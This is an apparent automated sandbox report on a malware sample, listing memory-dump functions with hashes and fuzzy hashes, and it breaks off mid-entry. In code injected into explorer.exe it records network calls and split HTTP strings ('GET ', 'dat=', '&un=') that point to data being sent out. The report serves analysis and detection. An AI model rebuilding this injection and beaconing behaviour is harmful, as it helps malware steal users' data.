                                                    • Instruction Fuzzy Hash: EEC08C30280A02ABEB261F60CD11B003BB1BB90B81F8400A06701DE0F0EB78D801EA10
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015BA537, Relevance: .0, Instructions: 11COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                    • Instruction ID: 0e72c6cec6aafd10fd7ab5d2b4efcfd36dab4e279d203b504ed6f588748e75cd
                                                    • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                    • Instruction Fuzzy Hash: 8CC01232080248BBCB126E82CC00F067B2AFBA4B60F008011BA080E5608632E970EA84
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01553A1C, Relevance: .0, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                    • Instruction ID: f023f62fc550cf9e99bd3f87564158922bc8f2ffe52ec494b2b24ffa7a7585c1
                                                    • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                    • Instruction Fuzzy Hash: DCC08C32080248BBC7126E81DC00F017B29E7A0B60F000021BA040A5608532ECA0D598
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0153AD30, Relevance: .0, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                    • Instruction ID: b75e58440852ae3248857fbd669d07472cd741c0bb27aaa6ae104cc86c41b286
                                                    • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                    • Instruction Fuzzy Hash: C5C08C32080248BBC7126A45DD00F017F29E7A4B60F000021BA040A6618932E861D588
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015636CC, Relevance: .0, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                    • Instruction ID: c105e48e87e953b688a47718ee30067ee086c75f33db3f761b04e0c01ee78cd5
                                                    • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                    • Instruction Fuzzy Hash: 3DC02B70158440FBD7151F70CD10F187258F740A21F64035473214E4F0E5289C00D100
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015476E2, Relevance: .0, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                    • Instruction ID: 06b8c5fa551a077c61d3a3f437ff508ce1058f51d3ad179cc04cfed4596e8d4c
                                                    • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                    • Instruction Fuzzy Hash: 86C08C701511815BEB2A570CCE20B283A51BB0C64CF88019CEA210D4A2C378A803C208
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01557D50, Relevance: .0, Instructions: 7COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                    • Instruction ID: db9535ac0dd0fb4966ff1528bb930a537d3fd4a552902c03135694635088337e
                                                    • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                    • Instruction Fuzzy Hash: D7B092353019408FCF66DF18C090B1933E4BB48A40B8400D0E800CBA21D229E8008900
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01562ACB, Relevance: .0, Instructions: 5COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                    • Instruction ID: b09f4e7af4c1d015cc0716987b2ad55cf06c41f4713462b60d3d42cf73385e24
                                                    • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                    • Instruction Fuzzy Hash: AAB01232C10842CFCF02EF80C610B197331FB40750F05449090012B930C23CAC01CB40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01579950, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3125131ee8bce2717b6829710498303169794ed3b0d9400e746af47eac361ca2
                                                    • Instruction ID: 8d7a35ab6f4df7899e97d234092b5f0615d717b0711a32721cf487b78d587a4c
                                                    • Opcode Fuzzy Hash: 3125131ee8bce2717b6829710498303169794ed3b0d9400e746af47eac361ca2
                                                    • Instruction Fuzzy Hash: 2D9002A124140403D1407599C804A071095B7D0342F51C411E2455959ECA698C517175
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015799D0, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ee361de9acdbdb5b0f1c050f1f244b2e287614ac5aa87ba1bdf3fb45c84d214b
                                                    • Instruction ID: 4ae6e34e388fefa20a2527a48c88a0f688b8ed85891ca8e93567345e9dae847a
                                                    • Opcode Fuzzy Hash: ee361de9acdbdb5b0f1c050f1f244b2e287614ac5aa87ba1bdf3fb45c84d214b
                                                    • Instruction Fuzzy Hash: A09002A125100042D1047199C404B0610D5B7E1241F51C412E2545958CC5698C616165
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0157B040, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d66531935d1f7b4b8b792984a08e5a7924a899e6fc7e3f3f2644962b618128b0
                                                    • Instruction ID: b619ea0538d6d8d02f1b6ca4b43c9d71586865d197ded9ef72be14e7a80c4328
                                                    • Opcode Fuzzy Hash: d66531935d1f7b4b8b792984a08e5a7924a899e6fc7e3f3f2644962b618128b0
                                                    • Instruction Fuzzy Hash: 699002A1641140434540B199C80480660A5B7E1341391C521E0845964CC6A88855A2A5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01579820, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 49e1878d76cfaca2393998b19d67090a797f9832e99a1617d52397dd9e79774e
                                                    • Instruction ID: 0bf77b7d07839956ebb3d8ed235800fdc80727baa9f7ea81eaf893a7013fe3bb
                                                    • Opcode Fuzzy Hash: 49e1878d76cfaca2393998b19d67090a797f9832e99a1617d52397dd9e79774e
                                                    • Instruction Fuzzy Hash: 3090027128100402D1417199C404A061099B7D0281F91C412E0815958EC6958A56BAA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015798A0, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7e85f0bc851c684ea482e2e021f9c07203f37f7e9a93f7db91e9b4b1f0b87b56
                                                    • Instruction ID: 0455e9ab55d2032c4d8a6ea53b16f37bc1ec6237fcd4738f954b9ad47749301d
                                                    • Opcode Fuzzy Hash: 7e85f0bc851c684ea482e2e021f9c07203f37f7e9a93f7db91e9b4b1f0b87b56
                                                    • Instruction Fuzzy Hash: A390026134100402D1027199C414A061099F7D1385F91C412E1815959DC6658953B172
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01579B00, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 86c0964566ed0c9b8a3a8d4fd0a3a23ad0bc26e3cb56d149ec14fe91f0fa59c5
                                                    • Instruction ID: 062cd3a1b7cee1dac3c2e3e02b3a171aa946904f295cec8db18f26dfbc832ece
                                                    • Opcode Fuzzy Hash: 86c0964566ed0c9b8a3a8d4fd0a3a23ad0bc26e3cb56d149ec14fe91f0fa59c5
                                                    • Instruction Fuzzy Hash: E190026128100802D1407199C414B071096F7D0641F51C411E0415958DC656896576F1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0157A3B0, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 80abf35012d802401895137146e51bd8223fa30ec93aea89e36195ab47c5c366
                                                    • Instruction ID: 23b366866eec8e9ccadb951e8c01e1a177dc68e2896d0a41d0aaccc48b9151bd
                                                    • Opcode Fuzzy Hash: 80abf35012d802401895137146e51bd8223fa30ec93aea89e36195ab47c5c366
                                                    • Instruction Fuzzy Hash: DA90027124144002D1407199C444A0B6095B7E0341F51C811E0816958CC6558856A261
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01579A10, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8d8cc8a536871eed49eac84744897e63a35514ce3f9732b8d6936c51f93ba520
                                                    • Instruction ID: 92789e6f29073665aa367a8d9a714d0aad094ccee4cb3ead2897384515fb3325
                                                    • Opcode Fuzzy Hash: 8d8cc8a536871eed49eac84744897e63a35514ce3f9732b8d6936c51f93ba520
                                                    • Instruction Fuzzy Hash: A090027124140402D1007199C808B471095B7D0342F51C411E5555959EC6A5C8917571
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01579A80, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4d410abe1883b86568eed13a70dacc67436456a6f52e0ed6c4d9f4f325a1df53
                                                    • Instruction ID: d242efb24b781ceaf45790398d68862a5d89091f15639d11ad1f4544dfc2c56d
                                                    • Opcode Fuzzy Hash: 4d410abe1883b86568eed13a70dacc67436456a6f52e0ed6c4d9f4f325a1df53
                                                    • Instruction Fuzzy Hash: A190026124144442D1407299C804F0F5195B7E1242F91C419E4547958CC95588556761
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01579560, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2a8008b0dfc56905a5f36b22a23e2347c6ebcf68c8a6bd40bc464083c04afb42
                                                    • Instruction ID: c53eaa2559286c324cd3187a5ecbe4bb3cc83ea1775f9f952ccb6bc3fc3c8f3b
                                                    • Opcode Fuzzy Hash: 2a8008b0dfc56905a5f36b22a23e2347c6ebcf68c8a6bd40bc464083c04afb42
                                                    • Instruction Fuzzy Hash: 46900265261000020145B599860490B14D5B7D6391391C415F1807994CC66188656361
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0157AD30, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c0a65f29b636c3fc2837ba74248501134ab19021284fbc2903f567335affec85
                                                    • Instruction ID: 3a6c0adf98ab8e5566ba718981d7470f5d1daf775dab7a3398c818d05fbc8b1e
                                                    • Opcode Fuzzy Hash: c0a65f29b636c3fc2837ba74248501134ab19021284fbc2903f567335affec85
                                                    • Instruction Fuzzy Hash: 03900271A450001291407199C814A465096B7E0781B55C411E0905958CC9948A5563E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01579520, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a20660232de11bfb93ca559ef58555a1db8f98eb5d8144505f814eb8c9f665d1
                                                    • Instruction ID: 06eb29b52fd8223114dcf8dfe89e07999fa0207f824cc17ec7ee3f7dd4da449c
                                                    • Opcode Fuzzy Hash: a20660232de11bfb93ca559ef58555a1db8f98eb5d8144505f814eb8c9f665d1
                                                    • Instruction Fuzzy Hash: A59002E1241140924500B299C404F0A5595B7E0241B51C416E1445964CC5658851A175
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015795F0, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5bf2a91b88ac74887e7bd374ea5f97b22b1053f2618a5127ef1181ee089b1b30
                                                    • Instruction ID: 684fdac0ecfad45368f875637e7da3de00c61bcdfa5324ea443962997da2f801
                                                    • Opcode Fuzzy Hash: 5bf2a91b88ac74887e7bd374ea5f97b22b1053f2618a5127ef1181ee089b1b30
                                                    • Instruction Fuzzy Hash: BC90027124100802D1047199C804A861095B7D0341F51C411E6415A59ED6A588917171
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0157A770, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 134695586afabcc72fc59aa82e00e50027d9992a0dd206df4081ba07a81c656e
                                                    • Instruction ID: 05a8b805fd4312444153aa6b18eb07974187481ada23479c13de4fc22e770c68
                                                    • Opcode Fuzzy Hash: 134695586afabcc72fc59aa82e00e50027d9992a0dd206df4081ba07a81c656e
                                                    • Instruction Fuzzy Hash: 7390027524504442D5007599D804E871095B7D0345F51D811E081599CDC6948861B161
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01579770, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7a84062c34e2a3566238f9a69f4d0fb7acde7d454b1754016e326aef179c48da
                                                    • Instruction ID: ff72811c3ad0d3349592c20d4bab8ddb75226a0376d15dd3a7ab3f32667994c1
                                                    • Opcode Fuzzy Hash: 7a84062c34e2a3566238f9a69f4d0fb7acde7d454b1754016e326aef179c48da
                                                    • Instruction Fuzzy Hash: 2A90026124504442D1007599D408E061095B7D0245F51D411E1455999DC6758851B171
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01579760, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d6a41ca28345781829980a91ca09e80b3c3081d775b69f8e631d7662bc08b3c2
                                                    • Instruction ID: 8d9f00b6509620a34678c82aa9f6848e5dd0210d420bc25c378394d539c49ef5
                                                    • Opcode Fuzzy Hash: d6a41ca28345781829980a91ca09e80b3c3081d775b69f8e631d7662bc08b3c2
                                                    • Instruction Fuzzy Hash: D190027124100403D1007199D508B071095B7D0241F51D811E081595CDD69688517161
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0157A710, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e812644f622f0dae1664d02969481db453f04a184db32dcf25c90ad0bc6391cc
                                                    • Instruction ID: 6a360da4e1cf50b78a9bfcd7883e80dfbd76e12d28bbc95c475eebe60960853e
                                                    • Opcode Fuzzy Hash: e812644f622f0dae1664d02969481db453f04a184db32dcf25c90ad0bc6391cc
                                                    • Instruction Fuzzy Hash: AB900271341000529500B6D9D804E4A5195B7F0341B51D415E4405958CC59488616161
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01579730, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4b7cebaa76389e37063ba04bd2166cdc655091a986920f3003cf3e4877e6819f
                                                    • Instruction ID: 362cf045649aebc5e8ecc9d1753d7a20ee7c294489ddb14f1ea0575b55e80935
                                                    • Opcode Fuzzy Hash: 4b7cebaa76389e37063ba04bd2166cdc655091a986920f3003cf3e4877e6819f
                                                    • Instruction Fuzzy Hash: C490026164500402D1407199D418B0610A5B7D0241F51D411E0415958DC6998A5576E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01579FE0, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 63aa706549e991ada310bab69ddec084499aaa41726d11f1a070155d8174b3c4
                                                    • Instruction ID: 5b91cf5600af65e6b362e7248f7e39a1a00ddda6b630e5147b9bf15a07d8354c
                                                    • Opcode Fuzzy Hash: 63aa706549e991ada310bab69ddec084499aaa41726d11f1a070155d8174b3c4
                                                    • Instruction Fuzzy Hash: A090027135114402D1107199C404B061095B7D1241F51C811E0C1595CDC6D588917162
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01579650, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8f19b21e859f082d12cf5805942924314456be006ff80e428cc84b2d8b908ddb
                                                    • Instruction ID: 7f3a8a215824e2b4d98d0688e77d8e8eaf6a5e643b65cb1a4e20c65df1eca2f5
                                                    • Opcode Fuzzy Hash: 8f19b21e859f082d12cf5805942924314456be006ff80e428cc84b2d8b908ddb
                                                    • Instruction Fuzzy Hash: FD90027124504842D1407199C404E4610A5B7D0345F51C411E0455A98DD6658D55B6A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01579610, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1d930f75bbb40265829f4e637f9e0c6b348a04fa49941dbda859fb06e5833c8a
                                                    • Instruction ID: 09a61b231e58b700e018ce252e2cea97cdb6eff61959c7a77502bd72bbc83962
                                                    • Opcode Fuzzy Hash: 1d930f75bbb40265829f4e637f9e0c6b348a04fa49941dbda859fb06e5833c8a
                                                    • Instruction Fuzzy Hash: 5090027164500802D1507199C414B461095B7D0341F51C411E0415A58DC7958A5576E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015796D0, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 392393ef0d9152743571612ff457e4891fc49ec272d286877207b4ec9595c90d
                                                    • Instruction ID: 18bfd315e4073d20f8716472100eaef4c6197f20b69d7763e06a9456c0f6d736
                                                    • Opcode Fuzzy Hash: 392393ef0d9152743571612ff457e4891fc49ec272d286877207b4ec9595c90d
                                                    • Instruction Fuzzy Hash: CB90027124100842D1007199C404F461095B7E0341F51C416E0515A58DC655C8517561
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01579670, Relevance: .0, Instructions: 2COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                    • Instruction ID: 7f49e760b3114edd23470b0a65dedff13a6ad6eb5738607bd1a0519a865dc327
                                                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                    • Instruction Fuzzy Hash:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015CFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015CFDFA
                                                    Strings
                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 015CFE2B
                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 015CFE01
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                    • API String ID: 885266447-3903918235
                                                    • Opcode ID: 562125e52199ec7fe2df91c4e84ff7fa663cc7f4a65bff7e89b8aca8a1931896
                                                    • Instruction ID: 914aaa6c9cfc1ceb796cd1940be5ef8075e537353a92dcb1c97b7b6dc98cc124
                                                    • Opcode Fuzzy Hash: 562125e52199ec7fe2df91c4e84ff7fa663cc7f4a65bff7e89b8aca8a1931896
                                                    • Instruction Fuzzy Hash: 6CF0C836200102BFD6201A85DC06E237B5AFB85B70F144219F6185E1D1E962B86086A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Analysis Process: explorer.exe PID: 3424 Parent PID: 1664 explorer.exeCOMMON

                                                    Executed Functions

                                                    Function 04DFB782, Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 814networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.918687274.0000000004DE0000.00000040.00000001.sdmp, Offset: 04DE0000, based on PE: false
                                                    Similarity
                                                    • API ID: getaddrinforecvsetsockopt
                                                    • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                                    • API String ID: 1564272048-1117930895
                                                    • Opcode ID: 0648fb3a1b3169a28be7094cd426224deaf617277f2c30b26ba9640e8e035f5f
                                                    • Instruction ID: f0344b1dbb04e061eeda11d9196e960d194d73b17c3d8e574a98c4764f564a59
                                                    • Opcode Fuzzy Hash: 0648fb3a1b3169a28be7094cd426224deaf617277f2c30b26ba9640e8e035f5f
                                                    • Instruction Fuzzy Hash: 41528E30618B088BDB29EF68D8847EAB7E1FB84304F51462ED59FC7146EE70B549CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04DFAA32, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642filenativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.918687274.0000000004DE0000.00000040.00000001.sdmp, Offset: 04DE0000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID: `
                                                    • API String ID: 823142352-2679148245
                                                    • Opcode ID: 14cba8f2f4844d27189a0e08a02a2bb7e42f2ade297706ca60ab44122fcb4a0a
                                                    • Instruction ID: 1e62df242ec3891ebabf45177e25d6ed4ddb2fe06c0217bc1e32cb740f99e1fc
                                                    • Opcode Fuzzy Hash: 14cba8f2f4844d27189a0e08a02a2bb7e42f2ade297706ca60ab44122fcb4a0a
                                                    • Instruction Fuzzy Hash: E1226C70B28A099FCB69EF68C8956AEF7E1FB98301F41422ED55ED7250DB30E451CB81
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04DF7FCC, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.918687274.0000000004DE0000.00000040.00000001.sdmp, Offset: 04DE0000, based on PE: false
                                                    Similarity
                                                    • API ID: closesocket
                                                    • String ID: clos$esoc$ket
                                                    • API String ID: 2781271927-3604069445
                                                    • Opcode ID: 36ea656e2822491c65f3aa84d39bde34fac214f70988beb3bb1069cb2183a916
                                                    • Instruction ID: d9069f4528858a2bb09d77c354aaece1e9123a136fe2ddec499a9149f95660be
                                                    • Opcode Fuzzy Hash: 36ea656e2822491c65f3aa84d39bde34fac214f70988beb3bb1069cb2183a916
                                                    • Instruction Fuzzy Hash: DCF0C27021CB484FC780EF289488B99B7E0FB8A314F4806ADE84ECB249C77185428743
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04DF7FD2, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
